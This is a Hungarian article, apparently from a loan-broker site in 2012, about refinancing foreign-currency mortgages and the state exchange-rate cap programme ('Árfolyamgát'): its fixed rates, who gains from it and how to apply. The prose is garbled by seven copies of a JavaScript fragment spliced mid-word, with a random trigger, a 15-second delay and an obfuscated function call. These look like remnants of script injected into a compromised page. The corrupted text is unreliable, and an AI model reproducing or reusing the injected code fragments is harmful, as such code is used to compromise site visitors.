Deviza hitel kiváltás

Magyarországon a jelzáloghitellel rendelkezők több mint 80%-a valamilyen devizában van eladósodva így a devizahitel kiváltás hazánkban milliókat érint. A svájci frank és az euro árfolyama azonban 2012-ben olyan magasan van, hogy nem minden esetben éri meg a devizahitelek forintra váltása. Devizahiteles adósként viszont a legjobb amit tehetünk hogy részt veszünk valamilyen állami fizetéskönnyítő programban, amelyre talán az egyetlen tényleg hasznos példa a 2012 április 1-je óta elérhető Árfolyamgát program.

Az Árfolyamgátról

Az árfolyamgát egy 5 éves hitelkönnyítő program, amelynek lényege, hogy a devizahitelünk tőketarandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}tozását egy ún. rögzített árfolyamon számítják át, amely CHF esetén 180 FT, EUR esetén 250 FT, JPY esetén pedig 2,5 FT. Az így átszámolt tőketarandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}tozás törlesztője és a mostani törlesztőnk között pedig keletkezik egy különbség, ami akár több tízezer forint is lehet havonta. Ez a több tízezer forinandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}tos árfolyamkülönbség 2 részből tevődik össze:

• Egy tőkerészéből,
• És egy kamatrészből.

A tőkerész igen kevés lesz abban az esetben, ha a futamidőnk első harmadában vagyunk, hiszen az annuitásos hitelek törlesztőjében kb. a futamidő feléig inkább csak kamaandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}tot fizetünk. A tőkerészt az árfolyamgát ideje alatt gyűjtik nekünk egy ún. gyűjtőszámlán, amelyet az 5 év letelte után kell majd kis összegekben visszafizetnünk.
A kamatrészt, amely viszont a törlesztő különbözet nagyobb részét teszi ki 100%-ban átvállalják helyettünk a legfeljebb 5 éves időszak alatt, ez tehát nekünk tiszta profit!
Végeredményben tehát 5 évig fizetünk egy jóval alacsonyabb törlesztőt, és az 5. év letelte után a gyűjtőszámlán felhalmozott tarandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}tozás miatt pedig újra a régi, vagy annál kicsivel magasabb törlesztőnk lesz.

Kinek éri meg az árfolyamgát?

Elsőre talán mindenki rávágja, hogy minden devizahitelesnek, ez azonban így nem teljesen igaz. Azoknak éri meg leginkább akik a futamidejük elején azaz nagyjából első harmadában járnak, hiszen ilyenkor még relatív magas a kamatrész, tehát az elengedett rész aránya. A kombi hitelesek járnak még vele kiemelkedően jól, hiszen ők a futam idő alatt csak kamaandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}tot fizetnek, a tőkerészt egy megtakarításba gyűjtik, ezáltal náluk igen sokat csökkenhet az árfolyamgát idején a törlesztő. Akinek viszont nem éri meg azok a rövid futamidővel rendelkező devizahitelesek, vagy a régen igényelt hitellel rendelkezők, hiszen ebben az esetben a tőkerész már számottevő lehet a törlesztőben, nagyobb mint amekkorát a kamatrész elengedésével nyerünk és így ezt összességében nem éri meg kamaandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}toztatni a gyűjtőszámlán.

Az árfolyamgát igénylése

Árfolyamgát igénylésére a lakáshiteleseknek 2012 április 1-től, a szabad felhasználású jelzáloghiteleseknek pedig 2012 augusztus 1-től van lehetőségük, a hitelt nyújtó bankjuknál egy formanyomtatvány kitöltésével! Igény esetén természetesen ebben is segítünk!